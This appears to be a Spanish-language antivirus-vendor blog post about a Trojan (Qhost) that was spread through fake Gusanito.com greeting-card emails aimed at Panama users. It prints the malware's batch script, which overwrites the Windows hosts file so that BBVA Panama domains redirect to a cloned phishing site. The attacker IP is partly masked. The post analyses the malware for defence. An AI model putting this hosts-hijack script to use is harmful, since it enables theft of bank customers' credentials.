Hace un par de días volvimos de una conferencia en Panamá, donde se presentaron ponencias sobre la delincuencia cibernética en América Central.
El mayor índice de conectividad a Internet se encuentra en Costa Rica, pero Panamá está en el primer lugar de ataques informáticos exitosos.
Los ataques se organizaron sobre todo contra los bancos del país. En este caso, Panamá es un objetivo dulce y codiciado para los delincuentes, por la inmensa cantidad de bancos que alberga gracias a las favorables condiciones económicas que ofrece, así como por la zona económica libre de impuestos.
En nuestra ponencia dijimos que hoy en día los ataques cibernéticos tienen carácter local. Es decir, que se crean en un país determinado para un contingente determinado de personas del mismo país y no suelen salir de los límites de la región o del país en sí. De esta manera, los delincuentes tratan de minimizar la posibilidad de que las amenazas sean detectadas por las compañías antivirus.
Acabábamos de volver de la conferencia y nos encontramos con que uno de estos ataques había ocurrido el 16 de abril. Los usuarios de correo electrónico en el dominio .pa recibieron envíos masivos de mensajes que invitaban a ver una tarjeta de un conocido recurso en América Latina, Gusanito.com. Al pulsar el enlace contenido en el mensaje, tenía lugar la descarga automática del fichero 001002003.exe, que a su vez perpetraba las siguientes acciones:
title AVERSINODETECTA———-HAHAHAHAHAHAHAHAHAHAHA
del c:WINDOWSsystem32driversetchosts
copy hosts c:WINDOWSsystem32driversetchosts
echo 75.127.*.* www.bbvapanama.com >>%windir%System32driversetchosts
echo 75.127.*.* bbvapanama.com >>%windir%System32driversetchosts
echo 75.127.*.* www.bbvanetpanama.com >>%windir%System32driversetchosts
echo 75.127.*.* bbvanetpanama.com >>%windir%System32driversetchosts
exit
echo > “C:DOCUME~1ADMINI~1LOCALS~1Temptmpfile0.tmp”
Como se ve, el programa nocivo agregaba al fichero de DNS locales una dirección IP especial para los nombres de dominio del banco BBV Panama. Además, por el texto del fichero se podría deducir que el autor es de habla española. En el campo “tilte” hay una frase en castellano: “a ver si no detecta”.
Si la víctima de este programa nocivo es cliente del banco y trata de entrar a la página web del mismo, se lo remite a un sitio falsificado, cuya apariencia es una copia exacta del sitio original:
En este momento Kaspersky Anti-Virus detecta este programa nocivo como Trojan.Win32.Qhost.alc
Hacemos notar que después de 3 días desde el inicio del ataque, hasta el momento sólo 2 antivirus detectan esta amenaza. Uno de ellos es Kaspersky Anti-Virus.
Esto confirma que los delincuentes tratan de reducir la difusión de sus criaturas nocivas a los límites de determinados territorios para garantizar que las compañías antivirus no puedan detectarlas por largo tiempo.
Panamá, dulce y codiciada